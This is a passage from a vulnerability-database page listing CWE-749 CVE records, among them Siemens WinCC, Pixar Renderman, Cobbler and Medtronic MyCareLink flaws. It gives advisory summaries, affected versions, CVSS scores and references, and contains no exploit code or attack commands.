Common Weakness Enumeration

CWE-749

Allowed

Exposed Dangerous Method or Function

Abstraction: Base · Status: Incomplete

The product provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.

304 vulnerabilities reference this CWE, most recent first.

CVE-2019-10918 (GCVE-0-2019-10918)

Vulnerability from cvelistv5 – Published: 2019-05-14 19:54 – Updated: 2024-08-04 22:40
VLAI
Summary
A vulnerability has been identified in SIMATIC PCS 7 V8.0 and earlier (All versions), SIMATIC PCS 7 V8.1 (All versions < V8.1 with WinCC V7.3 Upd 19), SIMATIC PCS 7 V8.2 (All versions < V8.2 SP1 with WinCC V7.4 SP1 Upd11), SIMATIC PCS 7 V9.0 (All versions < V9.0 SP2 with WinCC V7.4 SP1 Upd11), SIMATIC WinCC (TIA Portal) V13 (All versions), SIMATIC WinCC (TIA Portal) V14 (All versions < V14 SP1 Upd 9), SIMATIC WinCC (TIA Portal) V15 (All versions < V15.1 Upd 3), SIMATIC WinCC Runtime Professional V13 (All versions), SIMATIC WinCC Runtime Professional V14 (All versions < V14.1 Upd 8), SIMATIC WinCC Runtime Professional V15 (All versions < V15.1 Upd 3), SIMATIC WinCC V7.2 and earlier (All versions), SIMATIC WinCC V7.3 (All versions < V7.3 Upd 19), SIMATIC WinCC V7.4 (All versions < V7.4 SP1 Upd 11), SIMATIC WinCC V7.5 (All versions < V7.5 Upd 3). An authenticatd attacker with network access to the DCOM interface could execute arbitrary commands with SYSTEM privileges. The vulnerability could be exploited by an attacker with network access to the affected system. Successful exploitation requires authentication with a low-privileged user account and no user interaction. An attacker could use the vulnerability to compromise confidentiality and integrity and availability of the affected system. At the time of advisory publication no public exploitation of this security vulnerability was known.
Severity
No CVSS data available.
CWE
  • CWE-749 - Exposed Dangerous Method or Function
Assigner
References
Impacted products
Vendor Product Version
Siemens AG SIMATIC PCS 7 V8.0 and earlier Affected: All versions
Create a notification for this product.
Siemens AG SIMATIC PCS 7 V8.1 Affected: All versions < V8.1 with WinCC V7.3 Upd 19
Create a notification for this product.
Siemens AG SIMATIC PCS 7 V8.2 Affected: All versions < V8.2 SP1 with WinCC V7.4 SP1 Upd11
Create a notification for this product.
Siemens AG SIMATIC PCS 7 V9.0 Affected: All versions < V9.0 SP2 with WinCC V7.4 SP1 Upd11
Create a notification for this product.
Siemens AG SIMATIC WinCC (TIA Portal) V13 Affected: All versions
Create a notification for this product.
Siemens AG SIMATIC WinCC (TIA Portal) V14 Affected: All versions < V14 SP1 Upd 9
Create a notification for this product.
Siemens AG SIMATIC WinCC (TIA Portal) V15 Affected: All versions < V15.1 Upd 3
Create a notification for this product.
Siemens AG SIMATIC WinCC Runtime Professional V13 Affected: All versions
Create a notification for this product.
Siemens AG SIMATIC WinCC Runtime Professional V14 Affected: All versions < V14.1 Upd 8
Create a notification for this product.
Siemens AG SIMATIC WinCC Runtime Professional V15 Affected: All versions < V15.1 Upd 3
Create a notification for this product.
Siemens AG SIMATIC WinCC V7.2 and earlier Affected: All versions
Create a notification for this product.
Siemens AG SIMATIC WinCC V7.3 Affected: All versions < V7.3 Upd 19
Create a notification for this product.
Siemens AG SIMATIC WinCC V7.4 Affected: All versions < V7.4 SP1 Upd 11
Create a notification for this product.
Siemens AG SIMATIC WinCC V7.5 Affected: All versions < V7.5 Upd 3
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T22:40:15.144Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-697412.pdf"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.us-cert.gov/ics/advisories/ICSA-19-134-08"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "SIMATIC PCS 7 V8.0 and earlier",
          "vendor": "Siemens AG",
          "versions": [
            {
              "status": "affected",
              "version": "All versions"
            }
          ]
        },
        {
          "product": "SIMATIC PCS 7 V8.1",
          "vendor": "Siemens AG",
          "versions": [
            {
              "status": "affected",
              "version": "All versions \u003c V8.1 with WinCC V7.3 Upd 19"
            }
          ]
        },
        {
          "product": "SIMATIC PCS 7 V8.2",
          "vendor": "Siemens AG",
          "versions": [
            {
              "status": "affected",
              "version": "All versions \u003c V8.2 SP1 with WinCC V7.4 SP1 Upd11"
            }
          ]
        },
        {
          "product": "SIMATIC PCS 7 V9.0",
          "vendor": "Siemens AG",
          "versions": [
            {
              "status": "affected",
              "version": "All versions \u003c V9.0 SP2 with WinCC V7.4 SP1 Upd11"
            }
          ]
        },
        {
          "product": "SIMATIC WinCC (TIA Portal) V13",
          "vendor": "Siemens AG",
          "versions": [
            {
              "status": "affected",
              "version": "All versions"
            }
          ]
        },
        {
          "product": "SIMATIC WinCC (TIA Portal) V14",
          "vendor": "Siemens AG",
          "versions": [
            {
              "status": "affected",
              "version": "All versions \u003c V14 SP1 Upd 9"
            }
          ]
        },
        {
          "product": "SIMATIC WinCC (TIA Portal) V15",
          "vendor": "Siemens AG",
          "versions": [
            {
              "status": "affected",
              "version": "All versions \u003c V15.1 Upd 3"
            }
          ]
        },
        {
          "product": "SIMATIC WinCC Runtime Professional V13",
          "vendor": "Siemens AG",
          "versions": [
            {
              "status": "affected",
              "version": "All versions"
            }
          ]
        },
        {
          "product": "SIMATIC WinCC Runtime Professional V14",
          "vendor": "Siemens AG",
          "versions": [
            {
              "status": "affected",
              "version": "All versions \u003c V14.1 Upd 8"
            }
          ]
        },
        {
          "product": "SIMATIC WinCC Runtime Professional V15",
          "vendor": "Siemens AG",
          "versions": [
            {
              "status": "affected",
              "version": "All versions \u003c V15.1 Upd 3"
            }
          ]
        },
        {
          "product": "SIMATIC WinCC V7.2 and earlier",
          "vendor": "Siemens AG",
          "versions": [
            {
              "status": "affected",
              "version": "All versions"
            }
          ]
        },
        {
          "product": "SIMATIC WinCC V7.3",
          "vendor": "Siemens AG",
          "versions": [
            {
              "status": "affected",
              "version": "All versions \u003c V7.3 Upd 19"
            }
          ]
        },
        {
          "product": "SIMATIC WinCC V7.4",
          "vendor": "Siemens AG",
          "versions": [
            {
              "status": "affected",
              "version": "All versions \u003c V7.4 SP1 Upd 11"
            }
          ]
        },
        {
          "product": "SIMATIC WinCC V7.5",
          "vendor": "Siemens AG",
          "versions": [
            {
              "status": "affected",
              "version": "All versions \u003c V7.5 Upd 3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability has been identified in SIMATIC PCS 7 V8.0 and earlier (All versions), SIMATIC PCS 7 V8.1 (All versions \u003c V8.1 with WinCC V7.3 Upd 19), SIMATIC PCS 7 V8.2 (All versions \u003c V8.2 SP1 with WinCC V7.4 SP1 Upd11), SIMATIC PCS 7 V9.0 (All versions \u003c V9.0 SP2 with WinCC V7.4 SP1 Upd11), SIMATIC WinCC (TIA Portal) V13 (All versions), SIMATIC WinCC (TIA Portal) V14 (All versions \u003c V14 SP1 Upd 9), SIMATIC WinCC (TIA Portal) V15 (All versions \u003c V15.1 Upd 3), SIMATIC WinCC Runtime Professional V13 (All versions), SIMATIC WinCC Runtime Professional V14 (All versions \u003c V14.1 Upd 8), SIMATIC WinCC Runtime Professional V15 (All versions \u003c V15.1 Upd 3), SIMATIC WinCC V7.2 and earlier (All versions), SIMATIC WinCC V7.3 (All versions \u003c V7.3 Upd 19), SIMATIC WinCC V7.4 (All versions \u003c V7.4 SP1 Upd 11), SIMATIC WinCC V7.5 (All versions \u003c V7.5 Upd 3). An authenticatd attacker with network access to the DCOM interface could execute arbitrary commands with SYSTEM privileges. The vulnerability could be exploited by an attacker with network access to the affected system. Successful exploitation requires authentication with a low-privileged user account and no user interaction. An attacker could use the vulnerability to compromise confidentiality and integrity and availability of the affected system. At the time of advisory publication no public exploitation of this security vulnerability was known."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-749",
              "description": "CWE-749: Exposed Dangerous Method or Function",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-10-23T19:28:42.000Z",
        "orgId": "cec7a2ec-15b4-4faf-bd53-b40f371f3a77",
        "shortName": "siemens"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-697412.pdf"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.us-cert.gov/ics/advisories/ICSA-19-134-08"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "productcert@siemens.com",
          "ID": "CVE-2019-10918",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "SIMATIC PCS 7 V8.0 and earlier",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "All versions"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "SIMATIC PCS 7 V8.1",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "All versions \u003c V8.1 with WinCC V7.3 Upd 19"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "SIMATIC PCS 7 V8.2",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "All versions \u003c V8.2 SP1 with WinCC V7.4 SP1 Upd11"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "SIMATIC PCS 7 V9.0",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "All versions \u003c V9.0 SP2 with WinCC V7.4 SP1 Upd11"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "SIMATIC WinCC (TIA Portal) V13",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "All versions"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "SIMATIC WinCC (TIA Portal) V14",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "All versions \u003c V14 SP1 Upd 9"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "SIMATIC WinCC (TIA Portal) V15",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "All versions \u003c V15.1 Upd 3"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "SIMATIC WinCC Runtime Professional V13",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "All versions"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "SIMATIC WinCC Runtime Professional V14",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "All versions \u003c V14.1 Upd 8"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "SIMATIC WinCC Runtime Professional V15",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "All versions \u003c V15.1 Upd 3"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "SIMATIC WinCC V7.2 and earlier",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "All versions"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "SIMATIC WinCC V7.3",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "All versions \u003c V7.3 Upd 19"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "SIMATIC WinCC V7.4",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "All versions \u003c V7.4 SP1 Upd 11"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "SIMATIC WinCC V7.5",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "All versions \u003c V7.5 Upd 3"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Siemens AG"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A vulnerability has been identified in SIMATIC PCS 7 V8.0 and earlier (All versions), SIMATIC PCS 7 V8.1 (All versions \u003c V8.1 with WinCC V7.3 Upd 19), SIMATIC PCS 7 V8.2 (All versions \u003c V8.2 SP1 with WinCC V7.4 SP1 Upd11), SIMATIC PCS 7 V9.0 (All versions \u003c V9.0 SP2 with WinCC V7.4 SP1 Upd11), SIMATIC WinCC (TIA Portal) V13 (All versions), SIMATIC WinCC (TIA Portal) V14 (All versions \u003c V14 SP1 Upd 9), SIMATIC WinCC (TIA Portal) V15 (All versions \u003c V15.1 Upd 3), SIMATIC WinCC Runtime Professional V13 (All versions), SIMATIC WinCC Runtime Professional V14 (All versions \u003c V14.1 Upd 8), SIMATIC WinCC Runtime Professional V15 (All versions \u003c V15.1 Upd 3), SIMATIC WinCC V7.2 and earlier (All versions), SIMATIC WinCC V7.3 (All versions \u003c V7.3 Upd 19), SIMATIC WinCC V7.4 (All versions \u003c V7.4 SP1 Upd 11), SIMATIC WinCC V7.5 (All versions \u003c V7.5 Upd 3). An authenticatd attacker with network access to the DCOM interface could execute arbitrary commands with SYSTEM privileges. The vulnerability could be exploited by an attacker with network access to the affected system. Successful exploitation requires authentication with a low-privileged user account and no user interaction. An attacker could use the vulnerability to compromise confidentiality and integrity and availability of the affected system. At the time of advisory publication no public exploitation of this security vulnerability was known."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-749: Exposed Dangerous Method or Function"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://cert-portal.siemens.com/productcert/pdf/ssa-697412.pdf",
              "refsource": "CONFIRM",
              "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-697412.pdf"
            },
            {
              "name": "https://www.us-cert.gov/ics/advisories/ICSA-19-134-08",
              "refsource": "MISC",
              "url": "https://www.us-cert.gov/ics/advisories/ICSA-19-134-08"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cec7a2ec-15b4-4faf-bd53-b40f371f3a77",
    "assignerShortName": "siemens",
    "cveId": "CVE-2019-10918",
    "datePublished": "2019-05-14T19:54:48.000Z",
    "dateReserved": "2019-04-08T00:00:00.000Z",
    "dateUpdated": "2024-08-04T22:40:15.144Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2019-5015 (GCVE-0-2019-5015)

Vulnerability from cvelistv5 – Published: 2019-03-08 20:00 – Updated: 2024-09-16 19:04
VLAI
Summary
A local privilege escalation vulnerability exists in the Mac OS X version of Pixar Renderman 22.3.0's Install Helper helper tool. A user with local access can use this vulnerability to escalate their privileges to root. An attacker would need local access to the machine for a successful exploit.
CWE
  • CWE-749 - Exposed Dangerous Method or Function
Assigner
References
Impacted products
Vendor Product Version
Talos Pixar Renderman Affected: Renderman 22.3.0 for Mac OS X
Create a notification for this product.
Date Public
2019-03-06 00:00
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T19:40:49.177Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "107436",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/107436"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2019-0773"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Pixar Renderman",
          "vendor": "Talos",
          "versions": [
            {
              "status": "affected",
              "version": "Renderman 22.3.0 for Mac OS X"
            }
          ]
        }
      ],
      "datePublic": "2019-03-06T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "A local privilege escalation vulnerability exists in the Mac OS X version of Pixar Renderman 22.3.0\u0027s Install Helper helper tool. A user with local access can use this vulnerability to escalate their privileges to root. An attacker would need local access to the machine for a successful exploit."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "NONE",
            "baseScore": 9,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-749",
              "description": "CWE-749: Exposed Dangerous Method or Function",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-04-19T17:32:47.000Z",
        "orgId": "b86d76f8-0f8a-4a96-a78d-d8abfc7fc29b",
        "shortName": "talos"
      },
      "references": [
        {
          "name": "107436",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/107436"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2019-0773"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "talos-cna@cisco.com",
          "DATE_PUBLIC": "2019-03-06T00:00:00",
          "ID": "CVE-2019-5015",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Pixar Renderman",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Renderman 22.3.0 for Mac OS X"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Talos"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A local privilege escalation vulnerability exists in the Mac OS X version of Pixar Renderman 22.3.0\u0027s Install Helper helper tool. A user with local access can use this vulnerability to escalate their privileges to root. An attacker would need local access to the machine for a successful exploit."
            }
          ]
        },
        "impact": {
          "cvss": {
            "baseScore": 9,
            "baseSeverity": "Critical",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
            "version": "3.0"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-749: Exposed Dangerous Method or Function"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "107436",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/107436"
            },
            {
              "name": "https://talosintelligence.com/vulnerability_reports/TALOS-2019-0773",
              "refsource": "MISC",
              "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2019-0773"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b86d76f8-0f8a-4a96-a78d-d8abfc7fc29b",
    "assignerShortName": "talos",
    "cveId": "CVE-2019-5015",
    "datePublished": "2019-03-08T20:00:00.000Z",
    "dateReserved": "2019-01-04T00:00:00.000Z",
    "dateUpdated": "2024-09-16T19:04:24.135Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2018-10931 (GCVE-0-2018-10931)

Vulnerability from cvelistv5 – Published: 2018-08-09 20:00 – Updated: 2024-08-05 07:54
VLAI
Summary
It was found that cobbler 2.6.x exposed all functions from its CobblerXMLRPCInterface class over XMLRPC. A remote, unauthenticated attacker could use this flaw to gain high privileges within cobbler, upload files to arbitrary location in the context of the daemon.
CWE
Assigner
References
URL Tags
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2… x_refsource_CONFIRM
https://access.redhat.com/errata/RHSA-2018:2372 vendor-advisoryx_refsource_REDHAT
https://lists.fedoraproject.org/archives/list/pac… vendor-advisoryx_refsource_FEDORA
https://lists.fedoraproject.org/archives/list/pac… vendor-advisoryx_refsource_FEDORA
Impacted products
Date Public
2018-08-09 00:00
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T07:54:35.798Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10931"
          },
          {
            "name": "RHSA-2018:2372",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:2372"
          },
          {
            "name": "FEDORA-2019-3cacfb34ad",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CMWK5KCCZXOGOYNR2H6BWDSABTQ5NYJA/"
          },
          {
            "name": "FEDORA-2019-cd24f60a94",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5P5Q4ACIVZ5D4KSUDLGRTOKGGB4U42SD/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "cobbler",
          "vendor": "The Cobbler Project",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.x"
            }
          ]
        }
      ],
      "datePublic": "2018-08-09T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "It was found that cobbler 2.6.x exposed all functions from its CobblerXMLRPCInterface class over XMLRPC. A remote, unauthenticated attacker could use this flaw to gain high privileges within cobbler, upload files to arbitrary location in the context of the daemon."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-749",
              "description": "CWE-749",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-09-11T22:06:10.000Z",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10931"
        },
        {
          "name": "RHSA-2018:2372",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:2372"
        },
        {
          "name": "FEDORA-2019-3cacfb34ad",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CMWK5KCCZXOGOYNR2H6BWDSABTQ5NYJA/"
        },
        {
          "name": "FEDORA-2019-cd24f60a94",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5P5Q4ACIVZ5D4KSUDLGRTOKGGB4U42SD/"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2018-10931",
    "datePublished": "2018-08-09T20:00:00.000Z",
    "dateReserved": "2018-05-09T00:00:00.000Z",
    "dateUpdated": "2024-08-05T07:54:35.798Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2018-8868 (GCVE-0-2018-8868)

Vulnerability from cvelistv5 – Published: 2018-07-02 18:00 – Updated: 2025-05-22 18:14
VLAI
Title
Medtronic MyCareLink Patient Monitor Exposed Dangerous Method or Function
Summary
Medtronic 24950 MyCareLink Monitor and 24952 MyCareLink Monitor contains debug code meant to test the functionality of the monitor's communication interfaces, including the interface between the monitor and implantable cardiac device. An attacker with physical access to the device can exploit other vulnerabilities to access this debug functionality. This debug functionality provides the ability to read and write arbitrary memory values to implantable cardiac devices via inductive or short range wireless protocols. An attacker with close physical proximity to a target implantable cardiac device can use this debug functionality.
CWE
Assigner
Impacted products
Date Public
2018-06-29 06:00
Credits
Peter Morgan of Clever Security reported this vulnerability
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T07:10:46.236Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-179-01"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "24950 MyCareLink Monitor",
          "vendor": "Medtronic",
          "versions": [
            {
              "status": "affected",
              "version": "All versions"
            }
          ]
        },
        {
          "defaultStatus": "unaffected",
          "product": "24952 MyCareLink Monitor",
          "vendor": "Medtronic",
          "versions": [
            {
              "status": "affected",
              "version": "All versions"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Peter Morgan of Clever Security reported this vulnerability"
        }
      ],
      "datePublic": "2018-06-29T06:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003e\nMedtronic 24950 MyCareLink Monitor and 24952 MyCareLink Monitor contains debug code meant to test the functionality of the monitor\u0027s communication interfaces, including the interface between the monitor and implantable cardiac device. An attacker with physical access to the device can exploit other vulnerabilities to access this debug functionality. This debug functionality provides the ability to read and write arbitrary memory values to implantable cardiac devices via inductive or short range wireless protocols. An attacker with close physical proximity to a target implantable cardiac device can use this debug functionality.\n\n\u003c/p\u003e"
            }
          ],
          "value": "Medtronic 24950 MyCareLink Monitor and 24952 MyCareLink Monitor contains debug code meant to test the functionality of the monitor\u0027s communication interfaces, including the interface between the monitor and implantable cardiac device. An attacker with physical access to the device can exploit other vulnerabilities to access this debug functionality. This debug functionality provides the ability to read and write arbitrary memory values to implantable cardiac devices via inductive or short range wireless protocols. An attacker with close physical proximity to a target implantable cardiac device can use this debug functionality."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "PHYSICAL",
            "availabilityImpact": "LOW",
            "baseScore": 6.2,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:L",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-749",
              "description": "CWE-749",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-22T18:14:07.710Z",
        "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
        "shortName": "icscert"
      },
      "references": [
        {
          "url": "https://global.medtronic.com/xg-en/product-security/security-bulletins/mycarelink-6-28-18.html"
        },
        {
          "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-179-01"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cdiv\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eMedtronic will release several rolling over-the-air product updates that will mitigate the vulnerabilities described within this advisory. These updates will be applied to devices automatically as part of standard, reoccurring update processes. In addition, Medtronic has increased security monitoring of affected devices and related infrastructure. \u003c/span\u003e\n\n\u003c/div\u003e\n\n\u003cp\u003eMedtronic has released additional patient focused information, at the following location:\u003c/p\u003e\u003cp\u003e\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://www.medtronic.com/security\"\u003ehttps://www.medtronic.com/security\u003c/a\u003e\u003c/p\u003e\n\n\u003cbr\u003e"
            }
          ],
          "value": "Medtronic will release several rolling over-the-air product updates that will mitigate the vulnerabilities described within this advisory. These updates will be applied to devices automatically as part of standard, reoccurring update processes. In addition, Medtronic has increased security monitoring of affected devices and related infrastructure. \n\n\n\n\n\nMedtronic has released additional patient focused information, at the following location:\n\n https://www.medtronic.com/security"
        }
      ],
      "source": {
        "advisory": "ICSMA-18-179-01",
        "discovery": "EXTERNAL"
      },
      "title": "Medtronic MyCareLink Patient Monitor Exposed Dangerous Method or Function",
      "workarounds": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
